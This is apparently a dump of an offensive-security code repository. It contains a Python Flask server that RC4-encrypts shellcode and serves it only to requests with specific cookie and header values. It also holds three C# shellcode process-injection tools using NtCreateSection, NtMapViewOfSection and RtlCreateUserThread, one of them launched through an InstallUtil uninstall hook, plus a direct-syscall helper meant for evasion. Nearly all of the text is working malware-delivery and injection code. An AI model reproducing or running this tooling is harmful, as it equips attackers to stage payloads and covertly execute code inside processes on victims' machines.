{string}{ANSI_CLR}', end=end) 17 | if fatal: 18 | os._exit(-1) 19 | else: 20 | return ret 21 | 22 | def Perror(s, end='\n'): 23 | return __PrintStub(ANSI_RED, '-', s, False, fatal=True, end=end) 24 | 25 | def Pwarn(s, end='\n'): 26 | return __PrintStub(ANSI_ORNG, '!', s, False, end=end) 27 | 28 | def Pinfo(s, end='\n'): 29 | return __PrintStub(ANSI_CYAN, '*', s, True, end=end) 30 | 31 | def Psuccess(s, end='\n'): 32 | return __PrintStub(ANSI_GRN, '+', s, True, end=end) 33 | 34 | def Banner(): 35 | print(''' 36 | ██████╗ █████╗ ██╗███╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ███████╗██████╗ 37 | ██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ ██╔════╝██╔══██╗ 38 | ██████╔╝███████║██║██╔██╗ ██║██║ ███████║██║ ██║ █████╗ ██████╔╝ 39 | ██╔══██╗██╔══██║██║██║╚██╗██║██║ ██╔══██║██║ ██║ ██╔══╝ ██╔══██╗ 40 | ██║ ██║██║ ██║██║██║ ╚████║╚██████╗██║ ██║███████╗███████╗███████╗██║ ██║ 41 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ 42 | @v1.1 43 | ''') 44 | 45 | def SigHandler(sig, frame): 46 | Pinfo('Goodbye!') 47 | os._exit(0) 48 | 49 | def __Listen(args, app): 50 | try: 51 | ctx = None 52 | if args.ssl_crt and args.ssl_key: 53 | ctx = (args.ssl_crt, args.ssl_key) 54 | app.run(args.address, args.port, threaded=True, use_reloader=False, ssl_context=ctx) 55 | except Exception as e: 56 | Perror(f'Failed to start the HTTP listener: {str(e)}') 57 | 58 | def TListen(args, app): 59 | tid = None 60 | 61 | Pinfo('Starting the server thread...') 62 | try: 63 | tid = threading.Thread(target=__Listen, args=(args, app,)) 64 | tid.daemon = True 65 | 66 | tid.start() 67 | except Exception as e: 68 | Perror(f'Failed to start the listener thread: {str(e)}.') 69 | sleep(0.3) 70 | Psuccess('Done.\n') 71 | 72 | return tid 73 | 74 | def InitFlask(args): 75 | log = logging.getLogger('werkzeug') 76 | log.setLevel(logging.ERROR) 77 | 78 | app = Flask(__name__) 79 | 80 | @app.route(args.uri) 81 | def SC(): 82 | r = redirect(INVALID_REDIR, code=302) 83 | 84 | if request.cookies.get('CONSENT') and request.cookies.get('CONSENT') == 'YES' and request.headers.get('Accept-Encoding') and request.headers.get('Accept-Encoding') == 'gzip, deflate': 85 | Psuccess(f'Good hit on {args.uri} from {request.remote_addr}!') 86 | r = send_file(ENC_FILE_NAME, mimetype='application/octet-stream') 87 | else: 88 | Pwarn(f'Suspicious hit on {args.uri} from {request.remote_addr}!') 89 | return r 90 | 91 | return app 92 | 93 | def CryptShellcode(file, key): 94 | shellcode = None 95 | cipher = ARC4.new(key.encode('utf-8')) 96 | 97 | with open(file, mode='rb') as fr: 98 | shellcode = fr.read() 99 | 100 | try: 101 | with open(ENC_FILE_NAME, mode='wb') as fw: 102 | fw.write(cipher.encrypt(shellcode)) 103 | except Exception as e: 104 | Perror(f'Failed to write encrypted shellcode to a file. Is the directory writable?') 105 | 106 | def ParseArgs(): 107 | parser = argparse.ArgumentParser() 108 | parser.add_argument('-a', '--address', type=str, required=True, help="Listener address") 109 | parser.add_argument('-p', '--port', type=int, required=True, help="Listener port") 110 | parser.add_argument('-u', '--uri', type=str, required=True, help="URI where shellcode will be retrieved from") 111 | parser.add_argument('-f', '--file', type=str, required=True, help="Shellcode file to drop") 112 | parser.add_argument('-k', '--key', type=str, required=True, help="Shellcode encryption key") 113 | parser.add_argument('--ssl_key', type=str, required=False, help="Path to an SSL certificate") 114 | parser.add_argument('--ssl_crt', type=str, required=False, help="Path to an SSL key") 115 | 116 | args = parser.parse_args() 117 | r = True 118 | if args.port <= 0 or args.port > 65535: 119 | r = Pwarn("Port argument needs to be an integer between 1 and 65535.") 120 | if (args.port > 0 and args.port <= 1024) and os.geteuid() != 0: 121 | r = Pwarn("Ports between 1 and 1024 require root permissions.") 122 | if '/' not in args.uri: 123 | r = Pwarn("Valid URI needs to have a / (e.g. /download)") 124 | if not os.path.isfile(args.file) or not os.access(args.file, os.R_OK): 125 | r = Pwarn("Shellcode file is inaccessible (check permissions).") 126 | if len(args.key) < 5: 127 | r = Pwarn("RC4 key needs to be at least 5 characters long.") 128 | if (args.ssl_key and not args.ssl_crt) or (args.ssl_crt and not args.ssl_key): 129 | r = Pwarn("For SSL both key and crt options need to be selected.") 130 | if args.ssl_key and (not os.path.isfile(args.ssl_key) or not os.access(args.ssl_key, os.R_OK)): 131 | r = Pwarn("SSL Key file is inaccessible (check permissions).") 132 | if args.ssl_crt and (not os.path.isfile(args.ssl_crt) or not os.access(args.ssl_crt, os.R_OK)): 133 | r = Pwarn("SSL Crt file is inaccessible (check permissions).") 134 | 135 | if not r: 136 | os._exit(-1) 137 | 138 | return args 139 | 140 | if __name__ == '__main__': 141 | signal.signal(signal.SIGINT, SigHandler) 142 | 143 | Banner() 144 | userArgs = ParseArgs() 145 | 146 | CryptShellcode(userArgs.file, userArgs.key) 147 | 148 | app = InitFlask(userArgs) 149 | tid = TListen(userArgs, app) 150 | tid.join() -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectInstallUtil/SharpSectionJect.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | public class SharpSectionJect 5 | { 6 | private const UInt32 SECTION_MAP_WRITE = 0x0002; 7 | private const UInt32 SECTION_MAP_READ = 0x0004; 8 | private const UInt32 SECTION_MAP_EXECUTE = 0x0008; 9 | 10 | private const uint PAGE_EXECUTE_READ = 0x00000020; 11 | private const uint PAGE_EXECUTE_READWRITE = 0x00000040; 12 | private const uint PAGE_READWRITE = 0x00000004; 13 | private const uint SEC_COMMIT = 0x8000000; 14 | private const uint PROCESS_ALL_ACCESS = 0x001F0FFF; 15 | 16 | private static byte[] RC4(byte[] key, byte[] data) 17 | { 18 | int a, i, j, k, tmp; 19 | int[] keyBuf, box; 20 | byte[] cipher; 21 | 22 | keyBuf = new int[256]; 23 | box = new int[256]; 24 | cipher = new byte[data.Length]; 25 | 26 | for (i = 0; i < 256; i++) 27 | { 28 | keyBuf[i] = key[i % key.Length]; 29 | box[i] = i; 30 | } 31 | for (j = i = 0; i < 256; i++) 32 | { 33 | j = (j + box[i] + keyBuf[i]) % 256; 34 | tmp = box[i]; 35 | box[i] = box[j]; 36 | box[j] = tmp; 37 | } 38 | for (a = j = i = 0; i < data.Length; i++) 39 | { 40 | a++; 41 | a %= 256; 42 | j += box[a]; 43 | j %= 256; 44 | tmp = box[a]; 45 | box[a] = box[j]; 46 | box[j] = tmp; 47 | k = box[((box[a] + box[j]) % 256)]; 48 | cipher[i] = (byte)(data[i] ^ k); 49 | } 50 | return cipher; 51 | } 52 | 53 | public static void Inj(string arg1, string arg2, string arg3) 54 | { 55 | var args = new string[] { arg1, arg2, arg3 }; //Dirty patch from the EXE codebase 56 | 57 | UInt32 size = 4096, sectionSize = size; 58 | IntPtr sectionHandle = IntPtr.Zero, localSectionAddress = IntPtr.Zero, remoteSectionAddress = IntPtr.Zero; 59 | ulong sectionOffset = 0; 60 | 61 | if (args.Length == 3) 62 | { 63 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 64 | var currProcHandle = currProc.Handle; 65 | var currProcSessionId = currProc.SessionId; 66 | 67 | NtCreateSection(ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 68 | NtMapViewOfSection(sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 69 | 70 | int tPid = -1; 71 | int _pid = -1; 72 | 73 | if (Int32.TryParse(args[0], out _pid)) 74 | tPid = _pid; 75 | else 76 | { 77 | var processes = System.Diagnostics.Process.GetProcessesByName(args[0].Replace(".exe", string.Empty)); 78 | 79 | if (processes.Length >= 1) 80 | { 81 | foreach (System.Diagnostics.Process proc in processes) 82 | { 83 | if (proc.SessionId == currProcSessionId) 84 | { 85 | tPid = proc.Id; 86 | break; 87 | } 88 | } 89 | } 90 | } 91 | 92 | if (tPid >= 0) 93 | { 94 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 95 | 96 | if (targetHandle != IntPtr.Zero) 97 | { 98 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 99 | 100 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 101 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 102 | 103 | IntPtr targetThreadHandle = IntPtr.Zero; 104 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 105 | } 106 | else 107 | Console.WriteLine("Failed to open target process"); 108 | } 109 | else 110 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 111 | } 112 | else 113 | Console.WriteLine(@"Usage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false SharpSectionJect.dll"); 114 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 115 | } 116 | 117 | [DllImport("kernel32.dll", SetLastError = true)] 118 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 119 | 120 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 121 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 122 | 123 | [DllImport("ntdll.dll", SetLastError = true)] 124 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 125 | 126 | [DllImport("ntdll.dll", SetLastError = true)] 127 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 128 | } 129 | 130 | [System.ComponentModel.RunInstaller(true)] 131 | public class Stub : System.Configuration.Install.Installer 132 | { 133 | public override void Uninstall(System.Collections.IDictionary savedState) 134 | { 135 | SharpSectionJect.Inj("", "", ""); 136 | } 137 | } 138 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect/SharpSectionJect.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SharpSectionJect 5 | { 6 | public class SharpSectionJect 7 | { 8 | private const UInt32 SECTION_MAP_WRITE = 0x0002; 9 | private const UInt32 SECTION_MAP_READ = 0x0004; 10 | private const UInt32 SECTION_MAP_EXECUTE = 0x0008; 11 | 12 | private const uint PAGE_EXECUTE_READ = 0x00000020; 13 | private const uint PAGE_EXECUTE_READWRITE = 0x00000040; 14 | private const uint PAGE_READWRITE = 0x00000004; 15 | private const uint SEC_COMMIT = 0x8000000; 16 | private const uint PROCESS_ALL_ACCESS = 0x001F0FFF; 17 | 18 | //https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4 19 | private static byte[] RC4(byte[] key, byte[] data) 20 | { 21 | int a, i, j, k, tmp; 22 | int[] keyBuf, box; 23 | byte[] cipher; 24 | 25 | keyBuf = new int[256]; 26 | box = new int[256]; 27 | cipher = new byte[data.Length]; 28 | 29 | for (i = 0; i < 256; i++) 30 | { 31 | keyBuf[i] = key[i % key.Length]; 32 | box[i] = i; 33 | } 34 | for (j = i = 0; i < 256; i++) 35 | { 36 | j = (j + box[i] + keyBuf[i]) % 256; 37 | tmp = box[i]; 38 | box[i] = box[j]; 39 | box[j] = tmp; 40 | } 41 | for (a = j = i = 0; i < data.Length; i++) 42 | { 43 | a++; 44 | a %= 256; 45 | j += box[a]; 46 | j %= 256; 47 | tmp = box[a]; 48 | box[a] = box[j]; 49 | box[j] = tmp; 50 | k = box[((box[a] + box[j]) % 256)]; 51 | cipher[i] = (byte)(data[i] ^ k); 52 | } 53 | return cipher; 54 | } 55 | 56 | public static void Inj(string[] args) 57 | { 58 | UInt32 size = 4096, sectionSize = size; 59 | IntPtr sectionHandle = IntPtr.Zero, localSectionAddress = IntPtr.Zero, remoteSectionAddress = IntPtr.Zero; 60 | ulong sectionOffset = 0; 61 | 62 | if (args.Length == 3) 63 | { 64 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 65 | var currProcHandle = currProc.Handle; 66 | var currProcSessionId = currProc.SessionId; 67 | 68 | NtCreateSection(ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 69 | NtMapViewOfSection(sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 70 | 71 | int tPid = -1; 72 | 73 | if (Int32.TryParse(args[0], out int _pid)) 74 | tPid = _pid; 75 | else 76 | { 77 | var processes = System.Diagnostics.Process.GetProcessesByName(args[0].Replace(".exe", string.Empty)); 78 | 79 | if (processes.Length >= 1) 80 | { 81 | foreach (System.Diagnostics.Process proc in processes) 82 | { 83 | if (proc.SessionId == currProcSessionId) 84 | { 85 | tPid = proc.Id; 86 | break; 87 | } 88 | } 89 | } 90 | } 91 | 92 | if (tPid >= 0) 93 | { 94 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 95 | 96 | if (targetHandle != IntPtr.Zero) 97 | { 98 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 99 | 100 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 101 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 102 | 103 | IntPtr targetThreadHandle = IntPtr.Zero; 104 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 105 | } 106 | else 107 | Console.WriteLine("Failed to open target process"); 108 | } 109 | else 110 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 111 | } 112 | else 113 | Console.WriteLine("Usage: p.exe "); 114 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 115 | } 116 | 117 | static void Main(string[] args) 118 | { 119 | Inj(args); 120 | } 121 | 122 | [DllImport("kernel32.dll", SetLastError = true)] 123 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 124 | 125 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 126 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 127 | 128 | [DllImport("ntdll.dll", SetLastError = true)] 129 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 130 | 131 | [DllImport("ntdll.dll", SetLastError = true)] 132 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 133 | } 134 | 135 | } -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectDLL/SharpSectionJectDLL.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SharpSectionJectDLL 5 | { 6 | public class SharpSectionJectDLL 7 | { 8 | private const UInt32 SECTION_MAP_WRITE = 0x0002; 9 | private const UInt32 SECTION_MAP_READ = 0x0004; 10 | private const UInt32 SECTION_MAP_EXECUTE = 0x0008; 11 | 12 | private const uint PAGE_EXECUTE_READ = 0x00000020; 13 | private const uint PAGE_EXECUTE_READWRITE = 0x00000040; 14 | private const uint PAGE_READWRITE = 0x00000004; 15 | private const uint SEC_COMMIT = 0x8000000; 16 | private const uint PROCESS_ALL_ACCESS = 0x001F0FFF; 17 | 18 | //https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4 19 | private static byte[] RC4(byte[] key, byte[] data) 20 | { 21 | int a, i, j, k, tmp; 22 | int[] keyBuf, box; 23 | byte[] cipher; 24 | 25 | keyBuf = new int[256]; 26 | box = new int[256]; 27 | cipher = new byte[data.Length]; 28 | 29 | for (i = 0; i < 256; i++) 30 | { 31 | keyBuf[i] = key[i % key.Length]; 32 | box[i] = i; 33 | } 34 | for (j = i = 0; i < 256; i++) 35 | { 36 | j = (j + box[i] + keyBuf[i]) % 256; 37 | tmp = box[i]; 38 | box[i] = box[j]; 39 | box[j] = tmp; 40 | } 41 | for (a = j = i = 0; i < data.Length; i++) 42 | { 43 | a++; 44 | a %= 256; 45 | j += box[a]; 46 | j %= 256; 47 | tmp = box[a]; 48 | box[a] = box[j]; 49 | box[j] = tmp; 50 | k = box[((box[a] + box[j]) % 256)]; 51 | cipher[i] = (byte)(data[i] ^ k); 52 | } 53 | return cipher; 54 | } 55 | public static void Inj(string arg1, string arg2, string arg3) 56 | { 57 | var args = new string [] { arg1, arg2, arg3 }; //Dirty patch from the EXE codebase 58 | 59 | UInt32 size = 4096, sectionSize = size; 60 | IntPtr sectionHandle = IntPtr.Zero, localSectionAddress = IntPtr.Zero, remoteSectionAddress = IntPtr.Zero; 61 | ulong sectionOffset = 0; 62 | 63 | if (args.Length == 3) 64 | { 65 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 66 | var currProcHandle = currProc.Handle; 67 | var currProcSessionId = currProc.SessionId; 68 | 69 | NtCreateSection(ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 70 | NtMapViewOfSection(sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 71 | 72 | int tPid = -1; 73 | 74 | if (Int32.TryParse(args[0], out int _pid)) 75 | tPid = _pid; 76 | else 77 | { 78 | var processes = System.Diagnostics.Process.GetProcessesByName(args[0].Replace(".exe", string.Empty)); 79 | 80 | if (processes.Length >= 1) 81 | { 82 | foreach (System.Diagnostics.Process proc in processes) 83 | { 84 | if (proc.SessionId == currProcSessionId) 85 | { 86 | tPid = proc.Id; 87 | break; 88 | } 89 | } 90 | } 91 | } 92 | 93 | if (tPid >= 0) 94 | { 95 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 96 | 97 | if (targetHandle != IntPtr.Zero) 98 | { 99 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 100 | 101 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 102 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 103 | 104 | IntPtr targetThreadHandle = IntPtr.Zero; 105 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 106 | } 107 | else 108 | Console.WriteLine("Failed to open target process"); 109 | } 110 | else 111 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 112 | } 113 | else 114 | Console.WriteLine(@"Usage: [SharpSectionJectDLL.SharpSectionJectDLL]::Inj(, , )"); 115 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 116 | } 117 | 118 | [DllImport("kernel32.dll", SetLastError = true)] 119 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 120 | 121 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 122 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 123 | 124 | [DllImport("ntdll.dll", SetLastError = true)] 125 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 126 | 127 | [DllImport("ntdll.dll", SetLastError = true)] 128 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /Ballista/Ballista/Syscalls.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | using System.ComponentModel; 4 | 5 | using static Ballista.Native; 6 | using static Ballista.Releases; 7 | 8 | namespace Ballista 9 | { 10 | //Syscall inspiration from hxxps://jhalon.github.io/utilizing-syscalls-in-csharp-1/ 11 | class Syscalls 12 | { 13 | private static byte[] bSyscallSkeleton = 14 | { 15 | 0x4C, 0x8B, 0xD1, // mov r10, rcx 16 | 0xB8, 0xff, 0x00, 0x00, 0x00, // mov eax, 0xff (0xff is a placeholder byte at index 4 for other syscalls) 17 | 0x0F, 0x05, // syscall 18 | 0xC3 // ret 19 | }; 20 | 21 | public struct Delegates 22 | { 23 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 24 | public delegate NTSTATUS NtOpenProcess(ref IntPtr ProcessHandle, UInt32 AccessMask, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId); 25 | 26 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 27 | public delegate NTSTATUS NtCreateThreadEx(ref IntPtr threadHandle, UInt32 desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList); 28 | 29 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 30 | public delegate NTSTATUS NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 31 | 32 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 33 | public delegate NTSTATUS NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 34 | } 35 | 36 | public static NTSTATUS NtOpenProcess(int release, ref IntPtr ProcessHandle, UInt32 AccessMask, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId) 37 | { 38 | bSyscallSkeleton[4] = syscallOffsets[release]["NtOpenProcess"]; //NtOpenProcess 39 | byte[] syscall = bSyscallSkeleton; 40 | 41 | unsafe 42 | { 43 | fixed (byte* ptr = syscall) 44 | { 45 | IntPtr memoryAddress = (IntPtr)ptr; 46 | 47 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 48 | { 49 | throw new Win32Exception(); 50 | } 51 | 52 | Delegates.NtOpenProcess fp = (Delegates.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtOpenProcess)); 53 | 54 | return (NTSTATUS)fp(ref ProcessHandle, AccessMask, ref ObjectAttributes, ref ClientId); 55 | } 56 | } 57 | } 58 | public static NTSTATUS NtCreateThreadEx(int release, ref IntPtr threadHandle, UInt32 desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList) 59 | { 60 | bSyscallSkeleton[4] = syscallOffsets[release]["NtCreateThreadEx"]; //NtCreateThreadEx 61 | byte[] syscall = bSyscallSkeleton; 62 | 63 | unsafe 64 | { 65 | fixed (byte* ptr = syscall) 66 | { 67 | IntPtr memoryAddress = (IntPtr)ptr; 68 | 69 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 70 | { 71 | throw new Win32Exception(); 72 | } 73 | 74 | Delegates.NtCreateThreadEx fp = (Delegates.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateThreadEx)); 75 | 76 | return (NTSTATUS)fp(ref threadHandle, desiredAccess, objectAttributes, processHandle, startAddress, parameter, inCreateSuspended, stackZeroBits, sizeOfStack, maximumStackSize, attributeList); 77 | } 78 | } 79 | } 80 | public static NTSTATUS NtCreateSection(int release, ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle) 81 | { 82 | bSyscallSkeleton[4] = syscallOffsets[release]["NtCreateSection"]; 83 | byte[] syscall = bSyscallSkeleton; 84 | 85 | unsafe 86 | { 87 | fixed (byte* ptr = syscall) 88 | { 89 | IntPtr memoryAddress = (IntPtr)ptr; 90 | 91 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 92 | { 93 | throw new Win32Exception(); 94 | } 95 | 96 | Delegates.NtCreateSection fp = (Delegates.NtCreateSection)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateSection)); 97 | 98 | return (NTSTATUS)fp(ref SectionHandle, DesiredAccess, ObjectAttributes, ref MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle); 99 | } 100 | } 101 | } 102 | public static NTSTATUS NtMapViewOfSection(int release, IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect) 103 | { 104 | bSyscallSkeleton[4] = syscallOffsets[release]["NtMapViewOfSection"]; 105 | byte[] syscall = bSyscallSkeleton; 106 | 107 | unsafe 108 | { 109 | fixed (byte* ptr = syscall) 110 | { 111 | IntPtr memoryAddress = (IntPtr)ptr; 112 | 113 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 114 | { 115 | throw new Win32Exception(); 116 | } 117 | 118 | Delegates.NtMapViewOfSection fp = (Delegates.NtMapViewOfSection)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtMapViewOfSection)); 119 | 120 | return (NTSTATUS)fp(SectionHandle, ProcessHandle, ref BaseAddress, ZeroBits, CommitSize, out SectionOffset, out ViewSize, InheritDisposition, AllocationType, Win32Protect); 121 | } 122 | } 123 | } 124 | } 125 | } 126 | -------------------------------------------------------------------------------- /RainCaller/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | *.bin 7 | *.pem 8 | 9 | # User-specific files 10 | *.rsuser 11 | *.suo 12 | *.user 13 | *.userosscache 14 | *.sln.docstates 15 | 16 | # User-specific files (MonoDevelop/Xamarin Studio) 17 | *.userprefs 18 | 19 | # Mono auto generated files 20 | mono_crash.* 21 | 22 | # Build results 23 | [Dd]ebug/ 24 | [Dd]ebugPublic/ 25 | [Rr]elease/ 26 | [Rr]eleases/ 27 | x64/ 28 | x86/ 29 | [Ww][Ii][Nn]32/ 30 | [Aa][Rr][Mm]/ 31 | [Aa][Rr][Mm]64/ 32 | bld/ 33 | [Bb]in/ 34 | [Oo]bj/ 35 | [Ll]og/ 36 | [Ll]ogs/ 37 | 38 | # Visual Studio 2015/2017 cache/options directory 39 | .vs/ 40 | # Uncomment if you have tasks that create the project's static files in wwwroot 41 | #wwwroot/ 42 | 43 | # Visual Studio 2017 auto generated files 44 | Generated\ Files/ 45 | 46 | # MSTest test 